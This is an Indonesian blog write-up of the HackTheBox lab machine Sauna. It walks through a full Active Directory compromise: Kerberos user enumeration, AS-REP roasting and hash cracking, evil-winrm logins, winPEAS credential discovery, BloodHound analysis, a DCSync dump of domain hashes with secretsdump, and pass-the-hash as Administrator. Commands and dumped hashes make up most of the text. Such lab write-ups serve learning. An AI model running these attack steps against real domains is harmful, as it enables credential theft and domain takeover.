Skip to content
Home » HackTheBox | Sauna

HackTheBox | Sauna

Halo semuanya, kali ini gw akan bahas mesin hackthebox lagi, yang menjadi part dari active directory, yaitu sauna

Seperti biasa yang perlu kita lakukan di awal adalah scanning port dengan menggunakan nmap

└─# nmap -sSCV -O -A 10.10.10.175 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 08:03 EST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-20 20:03:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time: 
|   date: 2024-12-20T20:04:04
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   178.98 ms 10.10.14.1
2   179.04 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.85 seconds

kita bisa lihat bahwa versi IIS menunjukan, server yang digunakan adalah Windows 10 / Server 2016 / Server 2019. Dan nama domainnya bisa dilihat adalah EGOTISTICAL-BANK.LOCAL

kita akan coba cek dibagian smb nya dengan menggunakan smbclient

└─# smbclient -N -L  //10.10.10.175 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

tapi hasilnya nihil, selanjutnya kita beralih ke kerberos dengan melakukan brute username menggunakan tools ini https://github.com/ropnop/kerbrute

disini kita mendapatkan beberapa list username ini (fsmith, scoins, sdriver, btayload, hbear, skerb)

selanjutnya kita akan cari hashnya dengan menggunakan GetNPUsers.py untuk melihat user mana yang vulnerable

└─# python3 get.py -no-pass -usersfile user.txt -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:.............1a417738$ef4cee586cc339e42159aa3eca99ae62b4aedd3f67001b16dc035404c9edcd8c065b30606ba22f176f6b8ec530d56ab134f4f9dc97953b8a4817e2612eadc8c060ef7c5878a0010b82da75fa4192c892fa9fb813974c5588a8352d417331f5d285bc0a5b18c2e4a900bb0dbacb58d45665fdf3148888a19a8581e4a018e5f97aaaf4bfe8787a5fa6f1d83d934fdecd219ba02a3eb98e11f758a4755b5bdd57d73e34ce7dbd69a5f11c5525adc9b2a97b0421e65c6c2ce1a479741a63e972230934e58773746b28261fc698cce9f1512e15b1f21114c5d0a948c7eef1ee95a3abb39e7dfad43867a4c21c80f37261c43f7cfcfd75c671de1d37ef32e2d659ad47
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

disini kita bisa lihat, kita dapatkan hash dari user fsmith. Selanjutnya kita crack hash tersebut menggunakan john, masukan hashnya dalam sebuah file dan running

┌──(root㉿kali)-[~/latihan/sauna]
└─# john -w=/usr/share/wordlists/rockyou.txt jsmist   
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thes.....     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)     
1g 0:00:00:03 DONE (2024-12-20 08:24) 0.2659g/s 2802Kp/s 2802Kc/s 2802KC/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

maka kita bisa dapatkan value dari hashnya. Kita akan coba login dengan menggunakan evilwinrm dan kita dapatkan shellnya sekaligus user flag

└─# evil-winrm -i 10.10.10.175 -u fsmith -p 'Thest....'                        
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/20/2024  12:02 PM             34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
0761b9625a9d2499c3.............

selanjunya unt user privex kita bisa upload winpeas ke mesin target. pastikan kita menjalankan evil-winrm di folder yang sama dengan winpeas berada, agar lebih mudah untuk melakukan uploadnya.

*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winpeas.exe
                                        
Info: Uploading /root/hackthebox/sauna/winpeas.exe to C:\Users\FSmith\Documents\winpeas.exe
                                        
Data: 13122900 bytes of 13122900 bytes copied
                                        
Info: Upload successful!

jika sudah bisa langsung kita jalankan winpeasnya

disini kita bisa lihat, bahwa user EGOTISTICALBANK\svc_loanmanager di set automatically login, dan juga ada passwordnya

kita akan langsung login menggunakan user tersebut.

└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakesth........'

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

disini kita langsung upload sharphound dan kita jalankan

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload sharp.exe
                                        
Info: Uploading /root/hackthebox/sauna/sharp.exe to C:\Users\svc_loanmgr\Documents\sharp.exe
                                        
Data: 2076672 bytes of 2076672 bytes copied
                                        
Info: Upload successful!

jika proses sudah selesai, kita langsung download saja file zipnya

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20241220140529_BloodHound.zip
                                        
Info: Downloading C:\Users\svc_loanmgr\Documents\20241220140529_BloodHound.zip to 20241220140529_BloodHound.zip
                                        
Info: Download successful!

lalu kita jalankan bloodhound dan upload filenya ke bloodhound, dan jika sudah sukses terupload, kita lakukan privex

step 1 : kita cari SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL, klik kanan user node dan pilih mark user as owned
step 2 : kita analisis dan polih shortest path untuk domain admin
step 3 : klik kanan di garis antara keduanya, lalu pilih help

nah disin kita dapatkan bahwa SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL memiliki hak akses DS-Replication-Get-Changes dan DS-Replication-Get-Changes-All pada domain EGOTISTICAL-BANK.LOCAL

kita akan lakukan dcsync atttack

disini kita akan dump admin kredensialnya menggunakan secretsdump https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

└─# python3 scret.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452.......70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:3ef44b88a0af62c98a46c759486dc05c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:fceff73567f68ddb62d43ffc96dec0a09c4e0274ba1bed9ce6d70678a289d464
SAUNA$:aes128-cts-hmac-sha1-96:dc7aad98998001aa9121f3b711a921f0
SAUNA$:des-cbc-md5:5b2957eafddc6b1c

disini kita dapat hash dari administrator, langsung kita pakai untuk login saja dan kita masuk ke folder desktop untuk lihat rootnya.

└─# evil-winrm -u 'Administrator' -H '823452073d75b9d1cf7........f98e' -i 10.10.10.175 

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                               
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion               
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
23e4df5dde3de3862.....................
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Leave a Reply

Your email address will not be published. Required fields are marked *